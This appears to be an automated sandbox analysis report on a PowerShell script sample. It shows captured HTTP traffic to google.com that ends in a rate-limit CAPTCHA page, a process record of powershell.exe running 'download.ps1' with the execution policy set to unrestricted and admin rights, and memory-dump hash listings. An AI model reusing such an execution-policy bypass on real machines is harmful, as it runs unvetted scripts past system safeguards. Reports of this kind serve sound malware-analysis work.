                                                                  Set-Cookie: AEC=AZ6Zc-Uc9SI857GTKEIMwg7dp6ca0j4zkdBprUXio5-Uq2kxkROwApKO0g; expires=Wed, 18-Jun-2025 16:41:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                  Set-Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX; expires=Sat, 21-Jun-2025 16:41:15 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/htm
                                                                  Dec 20, 2024 17:41:16.471668959 CET335INData Raw: 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63
                                                                  Data Ascii: l;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFD
                                                                  Dec 20, 2024 17:41:16.472948074 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
                                                                  Dec 20, 2024 17:41:16.615920067 CET1289INHTTP/1.1 429 Too Many Requests
                                                                  Date: Fri, 20 Dec 2024 16:41:16 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3076
                                                                  X-XSS-Protection: 0
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                                  Dec 20, 2024 17:41:16.616164923 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                                  Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="-JtkE8DVUD5OBxfUnix3Jf4WYyUhVu45przpKL-vs5SG1Za7pFDmWF1-Jpye0NrUKtARWGM4R9va8j4V0ippDuXP4vwUJzlCpOwle_7XhEMbTzCKdCo6WjergZCUxFcko0drgNnL7JEiqc5B1hs6D3W
                                                                  Dec 20, 2024 17:41:16.616177082 CET778INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                                  Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:1
                                                                  Start time:11:41:09
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                  Imagebase:0x7ff709d20000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:11:41:09
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6cc9c0000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37f1ce7a2d1beb2c29d40314af0f427a3570f7b9feebf30292b7dd6f34bb61de
                                                                    • Instruction ID: ffcbd5d96217281795cf4941fc08917e2edd7135a4e17cc1700100f01b9790be
                                                                    • Opcode Fuzzy Hash: 37f1ce7a2d1beb2c29d40314af0f427a3570f7b9feebf30292b7dd6f34bb61de
                                                                    • Instruction Fuzzy Hash: 1EF1D671618A4D8FEBA8DF28C849BE937D1FF55350F04826EE84DC7695CF34A9418B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c22cb6434104bf0e8eed46ddd2a846a8fe9f92f1877b50ce63f2f822d06392c1
                                                                    • Instruction ID: 91dcf26e4dd6168786469fb33afe5719af3fe5cf03fadc510303d71d00cd9e15
                                                                    • Opcode Fuzzy Hash: c22cb6434104bf0e8eed46ddd2a846a8fe9f92f1877b50ce63f2f822d06392c1
                                                                    • Instruction Fuzzy Hash: BEE1F570618A4E8FEBA8EF28C859BE937D1FF55350F04826ED84DC7695CF34A9418B81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *GA
                                                                    • API String ID: 0-2864567849
                                                                    • Opcode ID: 1e21e7d0a870c328d9f0bdd6674d5b869ce6bc010a73167291a8787a0c92e79c
                                                                    • Instruction ID: 9420693a87f6feebf4f172b60a7621c4750f7f42dc36709d14d60323549b4e91
                                                                    • Opcode Fuzzy Hash: 1e21e7d0a870c328d9f0bdd6674d5b869ce6bc010a73167291a8787a0c92e79c
                                                                    • Instruction Fuzzy Hash: 9ED117B3A1D7C15FE302977C68669F47FA0EF53261B0840FBD08D874A7E919791683A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115570595.00007FFA7B320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b320000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P;-{
                                                                    • API String ID: 0-629811348
                                                                    • Opcode ID: b24d6cc314e48b44c8157a63c4e210cbe67ad134d6f097bf3e3653eeb7dcd5c9
                                                                    • Instruction ID: 502cf7010edee3ec63f503e27c3f1da11abbd44a091512d33fb709e7e5ba9342
                                                                    • Opcode Fuzzy Hash: b24d6cc314e48b44c8157a63c4e210cbe67ad134d6f097bf3e3653eeb7dcd5c9
                                                                    • Instruction Fuzzy Hash: FB118833A1CB448FE754EB1C98456B4BBE0FF6A350F0441BFD04DC32A2DA28AC858382
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89cd298f916778696fac3b910fdde3724477abc915f42f489292053ac59807e2
                                                                    • Instruction ID: 3cc5a4816b6171d204e05814c6bac1253d2bb60562a412ac171550c8eeb35d0b
                                                                    • Opcode Fuzzy Hash: 89cd298f916778696fac3b910fdde3724477abc915f42f489292053ac59807e2
                                                                    • Instruction Fuzzy Hash: AFB1E571618B4D4FEBA8DF28C8457E93BE1FF56350F04826AE44DC3696CB34A9458B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643110767515.00007FFA7AF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7AF5D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7af5d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aeddffb01b71fa5f2afea589e7a01858e985b6958b583b870d480b5bd182eaf2
                                                                    • Instruction ID: 1d2d0ad172bce1146383aeb481209df1978b547507e2f36498e9e7e0a2da3a15
                                                                    • Opcode Fuzzy Hash: aeddffb01b71fa5f2afea589e7a01858e985b6958b583b870d480b5bd182eaf2
                                                                    • Instruction Fuzzy Hash: 2641157181DFC49FE7568B29D841A527FF0EF57320B1605EFD088CB1A3D625A846C7A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b79ad310e1da6e3c6a1b0e37b3da1692f9963a77d188dae6b4858f0ba799a4b3
                                                                    • Instruction ID: e71553e99527072c237d61817a570b904cec6d73c4f48c40bed6a51aca9cdbda
                                                                    • Opcode Fuzzy Hash: b79ad310e1da6e3c6a1b0e37b3da1692f9963a77d188dae6b4858f0ba799a4b3
                                                                    • Instruction Fuzzy Hash: AA213A7190CB4C4FEB58DF6C884ABE97BE0EB56320F00826BD44CC7166DA74A45ACB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e060c82a9d6d60991b641a83ff30686acfb70b62710249dbcec956b96fa22f8
                                                                    • Instruction ID: 31fd7d74bab1fecf26b284f0d6b83550bc993464136432eb60fefb9639cb97ce
                                                                    • Opcode Fuzzy Hash: 5e060c82a9d6d60991b641a83ff30686acfb70b62710249dbcec956b96fa22f8
                                                                    • Instruction Fuzzy Hash: EF311E7292968E8EFBB49F14CC09FF93290FF46359F409139D40D865A6CB387A86CB11
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 077c61e0cc280a7a6f8c756eeadeba380210b4dbab86868ddae395c978bb499f
                                                                    • Instruction ID: 50feb2a7eeffb7af3b811be37832c509c4470ab1757fe33545f50f56e7aea339
                                                                    • Opcode Fuzzy Hash: 077c61e0cc280a7a6f8c756eeadeba380210b4dbab86868ddae395c978bb499f
                                                                    • Instruction Fuzzy Hash: D001677111CB0C4FDB44EF0CE451AA9B7E0FB95324F10456EE59EC3665D636E882CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115570595.00007FFA7B320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b320000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db4324d63d2e23fc6b8640ac0b82705cd0e7b71b4e02cc91148ee1e75e36f5b9
                                                                    • Instruction ID: 8329b10191272d2280d48be19686ae37657f499b29d5dc05e4c8162bf90f8d66
                                                                    • Opcode Fuzzy Hash: db4324d63d2e23fc6b8640ac0b82705cd0e7b71b4e02cc91148ee1e75e36f5b9
                                                                    • Instruction Fuzzy Hash: 47F09A32A1C6148FE798EB0CF8429E877E0FF4632071440F7E11DC75A7EA25AC468784
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4044f6ebcaf54caa8d7ae331d4743466c2f8c3acc23117712c8fac8aac9df4d
                                                                    • Instruction ID: 81ad0687ec4f726559ce39e938fae6db109f1f860859569cb84232d12402148f
                                                                    • Opcode Fuzzy Hash: a4044f6ebcaf54caa8d7ae331d4743466c2f8c3acc23117712c8fac8aac9df4d
                                                                    • Instruction Fuzzy Hash: C9F0F6718086898FDB05DF2488195D4BFA0FF16351B0442DBD448C71B5EB74A554CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (i0{${
                                                                    • API String ID: 0-1353647558
                                                                    • Opcode ID: 066e08eed228c3728ffd33243e2f3ef587118000fea30432a800fe65464e3d24
                                                                    • Instruction ID: 6b60e47fb327523cd98d84aa48f29742dd942fd43d915ac592e9c7bcf431093e
                                                                    • Opcode Fuzzy Hash: 066e08eed228c3728ffd33243e2f3ef587118000fea30432a800fe65464e3d24
                                                                    • Instruction Fuzzy Hash: C4D1C7A3A1D6C65BEB62973C58A94E9BF50EF53175B0880FBC44C8F0ABED1878478351
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {
                                                                    • API String ID: 0-366298937
                                                                    • Opcode ID: b1948560f8d53cd0c5e7668564b568c5584bedc7a4132df78662cb8f686dc3a6
                                                                    • Instruction ID: f0aa4dd686c28f612d2d53fcfec1eea788ad5c73360708aade35f4763eaa66e6
                                                                    • Opcode Fuzzy Hash: b1948560f8d53cd0c5e7668564b568c5584bedc7a4132df78662cb8f686dc3a6
                                                                    • Instruction Fuzzy Hash: B23284A3A1D7C24FE352472858A98E57FA0EF5326470980F7C489CB4B7E91D790B8762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @{$0@{$8@{$8@{$@@{$X@{$X@{$^T_I$`@{$h@{$x@{$@{
                                                                    • API String ID: 0-4253421388
                                                                    • Opcode ID: e9106dd8c3209b5f76804f2a4a4634ef69c4225d673c916e6a192a1b27ff7f35
                                                                    • Instruction ID: aa05b9b8bf7341913610ac7963d05eaa23ca9033d5510fd6fbd813290345b1b2
                                                                    • Opcode Fuzzy Hash: e9106dd8c3209b5f76804f2a4a4634ef69c4225d673c916e6a192a1b27ff7f35
                                                                    • Instruction Fuzzy Hash: CC61E3E3E4F7C50BE565825C681A475AF85EB432A176885FBE04C070AF6C39B91B8285
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643115148917.00007FFA7B2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B2E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b2e0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `u){$s-{$s-{$s-{$s-{$s-{$s-{$s-{
                                                                    • API String ID: 0-3497940576
                                                                    • Opcode ID: 55bfcc8e11f47d91cdc89dbad36ab8e502668e117776c95b099a29682ba80532
                                                                    • Instruction ID: 0a6f47d8337bd7a8302435aefbd31450062fadb8fcf00b9bf3c4c5ac111bbb22
                                                                    • Opcode Fuzzy Hash: 55bfcc8e11f47d91cdc89dbad36ab8e502668e117776c95b099a29682ba80532
                                                                    • Instruction Fuzzy Hash: 8AD1277291E7898FE795EB2988999683FA1FF57350B1841FED40DC71B7D928AC02C381
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.643111355526.00007FFA7B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA7B070000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffa7b070000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =T_^$T_^$T_^$T_^$T_^$T_^
                                                                    • API String ID: 0-75591508
                                                                    • Opcode ID: ce6b69a16ae2df40f92459bd3ef8b22dc800d7cfaabd2c597ae229542cf91ee7
                                                                    • Instruction ID: 3654b6e2393e284b00e9edfdd38d2a5b930fb99d4524384a607dae9ad24c8d57
                                                                    • Opcode Fuzzy Hash: ce6b69a16ae2df40f92459bd3ef8b22dc800d7cfaabd2c597ae229542cf91ee7
                                                                    • Instruction Fuzzy Hash: 4FC178A3E1D6D75FF722572868A94E83FE0EF632A471940B7C4CC4E4A7B908354B8651